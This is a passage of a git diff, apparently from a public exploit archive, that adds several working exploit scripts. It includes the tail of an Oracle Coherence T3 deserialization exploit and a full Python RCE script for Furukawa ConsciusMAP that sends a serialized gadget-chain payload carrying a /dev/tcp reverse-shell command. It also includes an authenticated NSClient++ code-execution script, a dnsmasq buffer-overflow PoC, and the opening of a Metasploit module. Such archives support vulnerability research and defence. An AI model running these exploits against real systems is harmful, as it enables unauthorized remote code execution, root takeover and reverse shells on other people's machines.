a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
+
+payload=struct.pack('>I',len(payload)) + payload[4:]
+
+print '[+] Sending payload...'
+sock.send(payload)
+data = sock.recv(1024)
+print >>sys.stderr, 'received "%s"' % data
+
+
+[Vendor]
+Oracle
+
+
+[Vulnerability Type]
+Network Remote
+
+
+
+[Description]
+Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation).
+Supported versions that are affected are 3.7.1.17, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.
+Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence.
+Successful attacks of this vulnerability can result in takeover of Oracle Coherence.
+CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
+
+
+[Disclosure Timeline]
+2019/12/10
+
+
+[+] Disclaimer
+The entry creation date may reflect when the CVE ID was allocated or reserved,
+and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.
+
+[Video]
+https://www.youtube.com/watch?v=59jt8rr8ECc
+
+@nu11secur1ty
+
+--
+
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+ nu11secur1ty
\ No newline at end of file
diff --git a/exploits/java/webapps/48380.txt b/exploits/java/webapps/48380.txt
new file mode 100644
index 000000000..6bc0a0374
--- /dev/null
+++ b/exploits/java/webapps/48380.txt
@@ -0,0 +1,338 @@
+# Exploit Title: Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution
+# Date: 2020-04-24
+# Vendor Homepage: https://www.tecnoredsa.com.ar
+# Exploit Authors: LiquidWorm
+# Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe
+# Version: 2.8.1
+# CVE : N/A
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+#
+#
+# Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution
+#
+#
+# Vendor: Furukawa Electric Co., Ltd. | Tecnored SA
+# Product web page: https://www.furukawa.co.jp | https://www.tecnoredsa.com.ar
+# Affected version: APROS Evolution | 2.8.1
+# FURUKAWA | 2.7.10
+# ConsciusMAP | 2.6.4
+# | 2.3.1
+# | 2.1.49
+# | 2.1.36
+# | 2.1.31
+# | 2.1.18
+# | 2.1.16
+# | 2.1.15
+# | 2.1.1
+# | 2.0.1174
+# | 1.8
+# | 1.4.70
+#
+# Summary: Apros Evoluation / Furukawa / ConsciusMap is the Tecnored
+# provisioning system for FTTH networks. Complete administration of
+# your entire external FTTH network plant, including from the ONUs
+# installed in each end customer, to the wiring and junction boxes.
+# Unify all the management of your FTTH network on a single platform.
+# Unify all your data, whether from customers, your network, or the
+# external plant in one place. APROS FTTH allows you to manage your
+# entire FTTH network in a simple and globalized way with just one
+# click, without being a network expert. Includes services such as:
+# bandwidth limitation, Turbo Internet for time plans, BURST Internet,
+# QinQ for companies, and many more. General consumption graphics and
+# per customer in real time. Captive Portal for cutting or suspension
+# of the service.
+#
+# Desc: The FTTH provisioning solution suffers from an unauthenticated
+# remote code execution vulnerability due to an unsafe deserialization
+# of Java objects (ViewState) triggered via the 'javax.faces.ViewState'
+# HTTP POST parameter. The deserialization can cause the vulnerable JSF
+# web application to execute arbitrary Java functions, malicious Java
+# bytecode, and system shell commands with root privileges.
+#
+# ===================================================================
+# $ ./furukawa.py 172.16.0.1:8080 172.168.0.200 4444
+# [*] Setting up valid URL path
+# [*] Starting callback listener child thread
+# [*] Starting handler on port 4444
+# [*] Sending serialized object
+# [*] Connection from 172.16.0.1:48446
+# [*] You got shell!
+# tomcat7@zslab:/var/lib/tomcat7$ id
+# uid=114(tomcat7) gid=124(tomcat7) grupos=124(tomcat7),1003(furukawa)
+# tomcat7@zslab:/var/lib/tomcat7$ sudo su
+# id
+# uid=0(root) gid=0(root) grupos=0(root)
+# exit
+# tomcat7@zslab:/var/lib/tomcat7$ exit
+# *** Connection closed by remote host ***
+# ===================================================================
+#
+# Tested on: Apache Tomcat/7.0.68
+# Apache Tomcat/7.0.52
+# Apache MyFaces/2.2.1
+# Apache MyFaces/2.1.17
+# Apache MyFaces/2.0.10
+# GNU/Linux 4.4.0-173
+# GNU/Linux 4.4.0-137
+# GNU/Linux 4.4.0-101
+# GNU/Linux 4.4.0-83
+# GNU/Linux 3.15.0
+# GNU/Linux 3.13.0-32
+# PrimeFaces/4.0.RC1
+# Apache-Coyote/1.1
+# ACC Library 3.1
+# Ubuntu 16.04.2
+# Ubuntu 14.04.2
+# Java/1.8.0_242
+# Java/1.8.0_181
+# Java/1.8.0_131
+# Java/1.7.0_79
+# MySQL 5.7.29
+# MySQL 5.7.18
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# Macedonian Information Security Research and Development Laboratory
+# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
+#
+#
+# Advisory ID: ZSL-2020-5565
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5565.php
+#
+# CVE ID: CVE-2020-12133
+# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-12133
+#
+#
+# 24.02.2020
+#
+
+import os#############
+import sys############
+import gzip#######o###
+import zlib###########
+import socket#########
+import base64#########
+import urllib#########
+import requests#######
+import telnetlib######
+import threading######
+import subprocess#####
+
+from io import BytesIO
+from time import sleep
+from flash import blic
+
+class Optics:
+
+ def __init__(self):
+ self.callback = None#
+ self.headers = None##
+ self.payload = None##
+ self.target = None###
+ self.lport = None####
+ self.path = None#####
+ self.cmd = None######
+
+ def allears(self):
+ telnetus = telnetlib.Telnet()
+ print("[*] Starting handler on port {}".format(self.lport))
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.bind(("0.0.0.0", self.lport))
+ while True:
+ try:
+ s.settimeout(8)
+ s.listen(1)
+ conn, addr = s.accept()
+ print("[*] Connection from {}:{}".format(addr[0], addr[1]))
+ telnetus.sock = conn
+ except socket.timeout as p:
+ print("[!] Probably not vulnerable... ({poraka})".format(poraka=p))
+ print("[+] Check your port mappings.")
+ s.close()
+ exit(0)
+ break
+
+ print("[*] You got shell!")
+
+ #
+ # UnicodeDecodeError dirty fix:
+ # /usr/lib/python3.6/telnetlib.py
+ # Change from 'ascii' to 'utf-8' (Lines: 553 and 556)
+ #
+
+ telnetus.interact()
+ conn.close()
+
+ def thricer(self):
+ print("[*] Starting callback listener child thread")
+ konac = threading.Thread(name="ZSL", target=self.allears)
+ konac.start()
+ sleep(1)
+ self.gadget()
+
+ def gadget(self):
+ self.cmd = "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/"
+ self.cmd += self.callback
+ self.cmd += "/"
+ self.cmd += str(self.lport)
+ self.cmd += "<&1"
+
+ payload = b"\xAC\xED\x00\x05\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C"
+ payload += b"\x2E\x48\x61\x73\x68\x53\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\x03"
+ payload += b"\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x02\x3F\x40\x00\x00\x00\x00\x00"
+ payload += b"\x01\x73\x72\x00\x34\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63"
+ payload += b"\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E"
+ payload += b"\x73\x2E\x6B\x65\x79\x76\x61\x6C\x75\x65\x2E\x54\x69\x65\x64\x4D\x61"
+ payload += b"\x70\x45\x6E\x74\x72\x79\x8A\xAD\xD2\x9B\x39\xC1\x1F\xDB\x02\x00\x02"
+ payload += b"\x4C\x00\x03\x6B\x65\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61"
+ payload += b"\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x03\x6D\x61\x70\x74"
+ payload += b"\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B"
+ payload += b"\x78\x70\x74\x00\x26\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x69\x74\x68"
+ payload += b"\x75\x62\x2E\x63\x6F\x6D\x2F\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66"
+ payload += b"\x2F\x6A\x65\x78\x62\x6F\x73\x73\x20\x73\x72\x00\x2A\x6F\x72\x67\x2E"
+ payload += b"\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F"
+ payload += b"\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x4C\x61\x7A"
+ payload += b"\x79\x4D\x61\x70\x6E\xE5\x94\x82\x9E\x79\x10\x94\x03\x00\x01\x4C\x00"
+ payload += b"\x07\x66\x61\x63\x74\x6F\x72\x79\x74\x00\x2C\x4C\x6F\x72\x67\x2F\x61"
+ payload += b"\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C"
+ payload += b"\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72"
+ payload += b"\x6D\x65\x72\x3B\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61"
+ payload += b"\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65"
+ payload += b"\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43"
+ payload += b"\x68\x61\x69\x6E\x65\x64\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72"
+ payload += b"\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\x54\x72"
+ payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72"
+ payload += b"\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F"
+ payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73"
+ payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72"
+ payload += b"\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E"
+ payload += b"\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x54\x72\x61\x6E\x73"
+ payload += b"\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\x02\x00"
+ payload += b"\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70"
+ payload += b"\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C"
+ payload += b"\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E"
+ payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D"
+ payload += b"\x65\x72\x58\x76\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69"
+ payload += b"\x43\x6F\x6E\x73\x74\x61\x6E\x74\x71\x00\x7E\x00\x03\x78\x70\x76\x72"
+ payload += b"\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x52\x75\x6E\x74\x69"
+ payload += b"\x6D\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72"
+ payload += b"\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D"
+ payload += b"\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66"
+ payload += b"\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72"
+ payload += b"\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38"
+ payload += b"\x02\x00\x03\x5B\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5B\x4C\x6A"
+ payload += b"\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C"
+ payload += b"\x00\x0B\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C"
+ payload += b"\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B"
+ payload += b"\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\x12"
+ payload += b"\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73"
+ payload += b"\x3B\x78\x70\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E"
+ payload += b"\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\x10\x73\x29\x6C"
+ payload += b"\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0A\x67\x65\x74\x52\x75"
+ payload += b"\x6E\x74\x69\x6D\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C"
+ payload += b"\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A"
+ payload += b"\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4D"
+ payload += b"\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72"
+ payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E"
+ payload += b"\x67\xA0\xF0\xA4\x38\x7A\x3B\xB3\x42\x02\x00\x00\x78\x70\x76\x71\x00"
+ payload += b"\x7E\x00\x1B\x73\x71\x00\x7E\x00\x13\x75\x71\x00\x7E\x00\x18\x00\x00"
+ payload += b"\x00\x02\x70\x75\x71\x00\x7E\x00\x18\x00\x00\x00\x00\x74\x00\x06\x69"
+ payload += b"\x6E\x76\x6F\x6B\x65\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72"
+ payload += b"\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63"
+ payload += b"\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00"
+ payload += b"\x7E\x00\x18\x73\x71\x00\x7E\x00\x13\x75\x72\x00\x13\x5B\x4C\x6A\x61"
+ payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\xAD\xD2"
+ payload += b"\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00"
+ payload += (bytes(chr(len(self.cmd)), "utf-8"))##################################"
+ payload += (bytes(self.cmd, "utf-8"))############################################"
+ payload += b"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x01"
+ payload += b"\x71\x00\x7E\x00\x20\x73\x71\x00\x7E\x00\x0F\x73\x72\x00\x11\x6A\x61"
+ payload += b"\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\x12\xE2"
+ payload += b"\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65"
+ payload += b"\x78\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D"
+ payload += b"\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\x00\x00\x78\x70\x00"
+ payload += b"\x00\x00\x01\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E"
+ payload += b"\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00"
+ payload += b"\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09"
+ payload += b"\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\x00"
+ payload += b"\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78"#######"
+
+ jbits = BytesIO()
+ with gzip.GzipFile(fileobj=jbits, mode="wb") as f:
+ f.write(payload)
+ serialize = base64.b64encode(jbits.getvalue())
+ print("[*] Sending serialized object")
+
+ self.headers = {
+ "Accept" : "text/html,application/xhtml+xml,application/xml;q=1.pwn",
+ "Content-Type" : "application/x-www-form-urlencoded",
+ "User-Agent" : "ISP-Eye/2.51",
+ "Connection" : "keep-alive"}
+
+ self.paramz={"javax.faces.ViewState" : serialize}
+ #sleep(1)
+ r = requests.post(self.target + self.path, headers=self.headers, data=self.paramz)
+
+ def par(self):
+ if len(sys.argv) != 4:
+ self.usage()
+ else:
+ self.target = sys.argv[1]
+ self.callback = sys.argv[2]
+ self.lport = int(sys.argv[3])
+ if not "http" in self.target:
+ self.target = "http://{}".format(self.target)
+
+ def check(self):
+ print("[*] Setting up valid URL path")
+ try:
+ r = requests.get(self.target)
+ app = r.text
+ if not "FURUKAWA" in app and not "APROS" in app:
+ print("[!] App not detected.")
+ exit(0)
+ if "FURUKAWA" in app:
+ self.path = "/FURUKAWA/"
+ elif "APROS" in app:
+ self.path = "/APROS/"
+ else:
+ exit(-1337)
+ except Exception as p:
+ print("[!] Somethingz wrong: \n--\n{poraka}".format(poraka=p))
+ exit(0)
+
+ def framed(self):
+ naslov = """
+ o===--------------------------------------===o
+ | |
+ | Furukawa Electric / Tecnored |
+ | APROS Evolution | FURUKAWA | ConsciusMAP |
+ | Fiber-To-The-Home (FTTH) |
+ | |
+ | Java Deserialization Remote Code Execution |
+ | ZSL-2020-5565 |
+ | |
+ o===--------------------------------------===o
+ ||
+ ||
+ (\__/)||
+ (•ㅅ•)||
+ / づ|
+ """
+ print(naslov)
+
+ def usage(self):
+ self.framed()
+ print("Usage: ./furukawa.py <RHOST[:RPORT]> <LHOST> <LPORT>")
+ print("Example: ./furukawa.py 172.16.0.1:8080 172.16.0.200 4444\n")
+ exit(0)
+
+ def main(self):
+ self.par()########()
+ self.check()######()
+ self.thricer()####()
+
+if __name__ == '__main__':
+ Optics().main()
\ No newline at end of file
diff --git a/exploits/json/webapps/48360.txt b/exploits/json/webapps/48360.txt
new file mode 100644
index 000000000..93eebe24e
--- /dev/null
+++ b/exploits/json/webapps/48360.txt
@@ -0,0 +1,192 @@
+# Exploit Title: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution
+# Google Dork: N/A
+# Date: 2020-04-20
+# Exploit Author: kindredsec
+# Vendor Homepage: https://nsclient.org/
+# Software Link: https://nsclient.org/download/
+# Version: 0.5.2.35
+# Tested on: Microsoft Windows 10 Pro (x64)
+# CVE: N/A
+#
+# NSClient++ is a monitoring agent that has the option to run external scripts.
+# This feature can allow an attacker, given they have credentials, the ability to execute
+# arbitrary code via the NSClient++ web application. Since it runs as NT Authority/System bt
+# Default, this leads to privileged code execution.
+
+#!/usr/bin/env python3
+
+import requests
+from bs4 import BeautifulSoup as bs
+import urllib3
+import json
+import sys
+import random
+import string
+import time
+import argparse
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+def generateName():
+
+ letters = string.ascii_lowercase + string.ascii_uppercase
+ return ''.join(random.choice(letters) for i in range(random.randint(8,13)))
+
+def printStatus(message, msg_type):
+
+ C_YELLOW = '\033[1;33m'
+ C_RESET = '\033[0m'
+ C_GREEN = '\033[1;32m'
+ C_RED = '\033[1;31m'
+
+ if msg_type == "good":
+ green_plus = C_GREEN + "[+]" + C_RESET
+ string = green_plus + " " + message
+
+ elif msg_type == "info":
+ yellow_ex = C_YELLOW + "[!]" + C_RESET
+ string = yellow_ex + " " + message
+
+ elif msg_type == "bad":
+ red_minus = C_RED + "[-]" + C_RESET
+ string = red_minus + " " + message
+
+ print(string)
+
+
+# This function adds a new external script containing the desired
+# command, then saves the configuration
+def configurePayload(session, cmd, key):
+
+ printStatus("Configuring Script with Specified Payload . . .", "info")
+ endpoint = "/settings/query.json"
+ node = { "path" : "/settings/external scripts/scripts",
+ "key" : key }
+ value = { "string_data" : cmd }
+ update = { "node" : node , "value" : value }
+ payload = [ { "plugin_id" : "1234",
+ "update" : update } ]
+ json_data = { "type" : "SettingsRequestMessage", "payload" : payload }
+
+ out = session.post(url = base_url + endpoint, json=json_data, verify=False)
+ if "STATUS_OK" not in str(out.content):
+ printStatus("Error configuring payload. Hit error at: " + endpoint, "bad")
+ sys.exit(1)
+
+ printStatus("Added External Script (name: " + key + ")", "good")
+ time.sleep(3)
+ printStatus("Saving Configuration . . .", "info")
+ header = { "version" : "1" }
+ payload = [ { "plugin_id" : "1234", "control" : { "command" : "SAVE" }} ]
+ json_data = { "header" : header, "type" : "SettingsRequestMessage", "payload" : payload }
+
+ session.post(url = base_url + endpoint, json=json_data, verify=False)
+
+
+# Since the application needs to be restarted after making changes,
+# this function reloads the application, and waits for it to come back.
+def reloadConfig(session):
+
+ printStatus("Reloading Application . . .", "info")
+ endpoint = "/core/reload"
+ session.get(url = base_url + endpoint, verify=False)
+
+ # Wait until the application successfully reloads by making a request
+ # every 10 seconds until it responds.
+ printStatus("Waiting for Application to reload . . .", "info")
+ time.sleep(10)
+ response = False
+ count = 0
+ while not response:
+ try:
+ out = session.get(url = base_url, verify=False, timeout=10)
+ if len(out.content) > 0:
+ response = True
+ except:
+ count += 1
+ if count > 10:
+ printStatus("Application failed to reload. Nice DoS exploit! /s", "bad")
+ sys.exit(1)
+ else:
+ continue
+
+
+# This function makes the call to the new external script to
+# ultimately execute the code.
+def triggerPayload(session, key):
+
+ printStatus("Triggering payload, should execute shortly . . .", "info")
+ endpoint = "/query/" + key
+ try:
+ session.get(url = base_url + endpoint, verify=False, timeout=10)
+ except requests.exceptions.ReadTimeout:
+ printStatus("Timeout exceeded. Assuming your payload executed . . .", "info")
+ sys.exit(0)
+
+
+# Before setting up the exploit, this function makes sure the
+# required feature (External Scripts) is enabled on the application.
+def enableFeature(session):
+
+ printStatus("Enabling External Scripts Module . . .", "info")
+ endpoint = "/registry/control/module/load"
+ params = { "name" : "CheckExternalScripts" }
+ out = session.get(url = base_url + endpoint, params=params, verify=False)
+ if "STATUS_OK" not in str(out.content):
+ printStatus("Error enabling required feature. Hit error at: " + endpoint, "bad")
+ sys.exit(1)
+
+
+# This function obtains an authentication token that gets added to all
+# remaining headers.
+def getAuthToken(session):
+
+ printStatus("Obtaining Authentication Token . . .", "info")
+ endpoint = "/auth/token"
+ params = { "password" : password }
+ auth = session.get(url = base_url + endpoint, params=params, verify=False)
+ if "auth token" in str(auth.content):
+ j = json.loads(auth.content)
+ authToken = j["auth token"]
+ printStatus("Got auth token: " + authToken, "good")
+ return authToken
+ else:
+ printStatus("Error obtaining auth token, is your password correct? Hit error at: " + endpoint, "bad")
+ sys.exit(1)
+
+
+
+parser = argparse.ArgumentParser("NSClient++ 0.5.2.35 Authenticated RCE")
+parser.add_argument('-t', nargs='?', metavar='target', help='Target IP Address.')
+parser.add_argument('-P', nargs='?', metavar='port', help='Target Port.')
+parser.add_argument('-p', nargs='?', metavar='password', help='NSClient++ Administrative Password.')
+parser.add_argument('-c', nargs='?', metavar='command', help='Command to execute on target')
+args = parser.parse_args()
+
+if len(sys.argv) < 4:
+ parser.print_help()
+ sys.exit(1)
+
+# Build base URL, grab needed arguments
+base_url = "https://" + args.t + ":" + args.P
+printStatus("Targeting base URL " + base_url, "info")
+password = args.p
+cmd = args.c
+
+# Get first auth token, and add it to headers of session
+s = requests.session()
+token = getAuthToken(s)
+s.headers.update({ "TOKEN" : token})
+
+# Generate a random name, enable the feature, add the payload,
+# then reload.
+randKey = generateName()
+enableFeature(s)
+configurePayload(s, cmd, randKey)
+reloadConfig(s)
+
+# Since application was reloaded, need a new auth token.
+token = getAuthToken(s)
+s.headers.update({ "TOKEN" : token})
+
+# Execute our code.
+triggerPayload(s, randKey)
\ No newline at end of file
diff --git a/exploits/linux/dos/48301.py b/exploits/linux/dos/48301.py
new file mode 100755
index 000000000..aa6146124
--- /dev/null
+++ b/exploits/linux/dos/48301.py
@@ -0,0 +1,38 @@
+# Exploit Title: dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)
+# Date: 2020-04-06
+# Exploit Author: Josue Encinar
+# Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1
+# Version: 2.79
+# Tested on: Ubuntu 18.04
+
+
+from subprocess import Popen, PIPE
+
+data = ""
+bof = False
+for i in range (1, 200):
+ A = "A"*i
+ data = f"dhcp_release {A} 1 1"
+ try:
+ result = Popen(data, stdout=PIPE, stderr=PIPE, shell=True)
+ error = result.stderr.read().decode()
+ if "Aborted (core dumped)" in error:
+ print("[+] Buffer Overflow detected!")
+ print(f"[*] Offset: {i}")
+ bof = True
+ break
+ except Exception as e:
+ print(f"[-] {e}")
+
+if not bof:
+ print("[-] No buffer overflow...")
+
+
+## Check line 273 in dhcp_release.c
+### strcpy(ifr.ifr_name, argv[1]);
+#
+## PoC:
+# josue@ubuntu:~/Escritorio/bof_dhcp$ python3 dhcp_release_bof.py
+# *** buffer overflow detected ***: dhcp_release terminated
+# [+] Buffer Overflow detected!
+# [*] Offset: 16
\ No newline at end of file
diff --git a/exploits/linux/local/40953.sh b/exploits/linux/local/40953.sh
index b00215e3a..e56a4c896 100755
--- a/exploits/linux/local/40953.sh
+++ b/exploits/linux/local/40953.sh
@@ -2,7 +2,7 @@
#
# Exploit Title: Vesta Control Panel 0.9.7 <= 0.9.8-16 Local Privilege Escalation Exploit
# Google Dork: vesta control panel inurl:8083
-# Exploit Author: Luka Pusic, Jaka Hudoklin @offlinehacker
+# Exploit Author: Jaka Hudoklin @offlinehacker
# Vendor Homepage: http://vestacp.com/
# Software Link: https://github.com/serghey-rodin/vesta
# Version: 0.9.7 - 0.9.8-16
diff --git a/exploits/linux/remote/48333.rb b/exploits/linux/remote/48333.rb
new file mode 100755
index 000000000..b7bcaa136
--- /dev/null
+++ b/exploits/linux/remote/48333.rb
@@ -0,0 +1,274 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
